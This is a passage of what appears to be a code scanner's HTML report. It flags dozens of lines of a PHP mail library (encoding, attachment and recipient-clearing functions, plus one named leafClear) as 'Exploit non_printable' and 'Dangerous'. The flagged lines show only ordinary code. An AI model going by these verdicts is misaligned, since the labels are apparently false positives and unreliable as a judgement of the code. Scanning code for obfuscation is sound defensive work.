</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2832</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2968</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2983</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3037</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3048</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3057</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3059</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3076</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3112</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3114</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3135</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3186</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3213</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3361</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3407</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3421</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3432</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3446</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 348</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3495</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
